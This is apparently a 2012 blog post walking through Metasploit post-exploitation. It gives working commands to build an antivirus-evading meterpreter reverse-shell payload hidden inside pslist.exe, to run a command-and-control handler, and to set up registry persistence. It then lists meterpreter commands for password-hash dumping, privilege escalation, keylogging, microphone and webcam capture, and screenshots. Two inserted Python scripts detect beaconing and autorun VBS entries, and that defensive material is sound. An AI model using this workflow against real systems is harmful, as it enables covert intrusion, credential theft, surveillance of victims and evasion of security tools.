Friday, March 30, 2012

Post Exploitation Control

Once you've gained access to a box, there are many options for "post-exploitation" control. Our main goals at that point in the game are:
  • Continued control- You don't want to lose control after a reboot or whatnot.
  • Control flexibility- A control method that allows us to interact with the system however we want (GUI, etc.)
  • Facilitate privilege escalation- If we only have user-level access, we want a control method that facilitates efforts to gain SYSTEM/root
  • Facilitate pivoting- An easy platform for attacking other systems through our compromised host.
  • Evading detection- We don't want logs/IDS/anti-virus to cause us any issues.

A good control method that meets these goals relatively well is to use meterpreter in a persistent fashion.

The rest of the post will be a quick demo on:
  1. Creating a meterpreter payload exe
  2. Setting up a command and control handler
  3. Making the target systems persistent so the machine stays owned
  4. A few useful meterpreter commands.

1) Creating a meterpreter payload exe
First we download metasploit from and install it; I'll use version 4.2. You'll also need the ruby and ruby-gems packages installed.
First order of business is to create a stand-alone meterpreter exe that, when executed, will connect back to a meterpreter listener, which we'll set up later. This is done with the msfpayload utility, and then passed through msfencode to make it harder for IDS and anti-virus to detect. We are going to encode our payload into a known good exe, so I download pslist.exe from Sysinternals to use for that. You can play around with other executables; your mileage may vary.
This is the command I use to create my payload (replace the info in quotes). It's detected by about half of the AV vendors... still working on that.
/opt/metasploit-4.2.0/app/msfpayload windows/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="LISTENER PORT" R | /opt/metasploit-4.2.0/app/msfencode -t exe ~/pslist.exe -o /root/payload.exe -e x86/shikata_ga_nai -c 10

This creates our metasploit payload and encodes it with the Shikata ga nai method 10 times, outputting the final product to /root/payload.exe.
The payload will connect to our handler (which we will set up in a second) and give us a meterpreter shell on the target.

2) Setting up a command and control handler
Now let's set up a persistent metasploit handler on a machine out on the internet, so our pwned targets have a place to call home to.

Note: If using a previous version of metasploit, you can edit the msfcli script to add in the -J (Execute the selected module as a background job) functionality that we're going to use. Instructions for adding that functionality can be found at:

To start up a listener we use the msfcli command like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost="LISTENER IP" lport="LISTENER PORT" ExitOnSession=false J

And we're ready to accept connections.

When a target executes our payload, we'll see the handler take the connection and start a meterpreter session with it. You can see any established sessions with the command "sessions -l". You can then interact with any session by running "sessions -i (sessionId)".
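As an added defender-side example (not code from the original post), here is a small Python script that looks for the connect-back the handler above is waiting for: a workstation repeatedly connecting to the same external IP and port at a steady short interval, which is what a reverse_tcp payload looks like on the wire while it retries a listener it cannot reach or reconnects on a timer. The log lines are constructed, and the line format and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed firewall log lines: "<timestamp> <src> -> <dst>:<dport>".
# 10.0.0.5 retries a listener every 5 s; 10.0.0.9 is ordinary HTTPS traffic.
SAMPLE_LOG = """\
2012-03-30T10:00:00 10.0.0.5 -> 203.0.113.7:4444
2012-03-30T10:00:05 10.0.0.5 -> 203.0.113.7:4444
2012-03-30T10:00:10 10.0.0.5 -> 203.0.113.7:4444
2012-03-30T10:00:15 10.0.0.5 -> 203.0.113.7:4444
2012-03-30T10:00:20 10.0.0.5 -> 203.0.113.7:4444
2012-03-30T10:00:01 10.0.0.9 -> 198.51.100.20:443
2012-03-30T10:03:40 10.0.0.9 -> 198.51.100.20:443
2012-03-30T10:11:02 10.0.0.9 -> 198.51.100.20:443
2012-03-30T10:15:00 10.0.0.9 -> 198.51.100.20:443
"""

def parse(log):
    """Group connection timestamps by (source host, destination ip:port)."""
    flows = defaultdict(list)
    for line in log.splitlines():
        ts, src, _, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(log, min_hits=4, max_interval=60.0, max_jitter=0.2):
    """Return (src, dst, mean_gap_seconds) for flows with regular, short gaps.

    Thresholds are assumptions: a payload retrying its handler on a fixed
    timer produces near-identical gaps, so the coefficient of variation
    (stdev / mean) of the gaps is close to zero; human traffic is bursty.
    """
    hits = []
    for (src, dst), times in parse(log).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if 0 < avg <= max_interval and pstdev(gaps) / avg <= max_jitter:
            hits.append((src, dst, avg))
    return hits
```

Run it over real firewall or netflow exports by adapting parse() to your field layout; a long-lived established session shows up instead as a single flow with a large byte count, so pair this with a check for unusual ports to the internet.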

3) Making the target systems persistent, so the machine stays owned
Connect to a session with "sessions -i (sessionId)". Now you can make the system automatically reconnect every 5 seconds in the event you lose connection to it, by issuing this command:
run persistence -U -i 5 -p "LISTENER PORT" -r "LISTENER IP"

It converts the payload to a vbs file which it calls from the registry. Now if your victim reboots or moves or you restart your handler, they will just connect back in as soon as they can.
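The text above says the persistence script drops the payload as a .vbs file and launches it from the registry. As an added defender-side example (not code from the original post), here is a Python audit of a Windows registry export (.reg text) that flags Run/RunOnce values invoking a script host or a .vbs file, with an extra note when the path is in a temp directory. The export is constructed, and the key paths and heuristics are assumptions to tune for your environment.

```python
import re

# Only values under the autorun keys (assumption: Run and RunOnce).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
# A script host or a .vbs path in an autorun value is the signal to review.
SCRIPT_RE = re.compile(r"(wscript|cscript)\.exe|\.vbs\b", re.IGNORECASE)
TEMP_RE = re.compile(r"\\Temp\\|%TEMP%", re.IGNORECASE)

# Constructed .reg export: two benign entries, two that should be flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"xXyZ"="C:\\Users\\bob\\AppData\\Local\\Temp\\rAnDoM.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="wscript.exe //B C:\\ProgramData\\upd.vbs"
"""

def parse_reg(text):
    """Yield (key, value_name, data) for each string value, .reg escapes undone."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key and m:
            data = m.group("data").replace('\\"', '"').replace("\\\\", "\\")
            yield key, m.group("name"), data

def suspicious_autoruns(text):
    """Return (key, name, data, reason) for Run/RunOnce values worth a look."""
    findings = []
    for key, name, data in parse_reg(text):
        if not RUN_KEY_RE.search(key) or not SCRIPT_RE.search(data):
            continue
        reason = "script host or .vbs in autorun"
        if TEMP_RE.search(data):
            reason += "; launched from a temp directory"
        findings.append((key, name, data, reason))
    return findings
```

Feed it the output of "reg export" for the Run keys of each user hive and HKLM; anything it flags deserves a look at the script's contents and the account that created it.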

4) A few useful meterpreter commands
Now on to meterpreter commands. There is no way I could list all the usages of Meterpreter, but here's some of the quick ones you'll want to know.
  • getuid- Shows the account you are executing under.
  • getsystem- This uses a variety of methods to try to escalate privileges; if you're lucky it'll get you "NT AUTHORITY\SYSTEM".
  • hashdump- Dumps the password hashes, as you'd expect.

These hashes can be cracked or used in a pass-the-hash attack, which we'll probably cover in a future post.

  • getpid- Gets your current process's PID
  • migrate- Moves the meterpreter service and injects it into another process

Here's an example of migrating over to the LSASS process

Sometimes you're unable to display hashes with hashdump because of process controls that only allow certain processes to access hashes. Simply migrating to another process, such as LSASS, can allow you to bypass that control.

More commands:
  • keyscan_start- Start grabbing keystrokes
  • keyscan_dump- View keystrokes
  • record_mic- Record audio from the default microphone
  • webcam_snap- Take a snapshot from the specified webcam
  • screenshot- Grab a screenshot of the user's desktop

There's much, much more you can do with meterpreter. There are built-in commands for network tunnels, and for pivoting attacks on additional systems through the currently owned target, but that probably deserves its own blog entry.
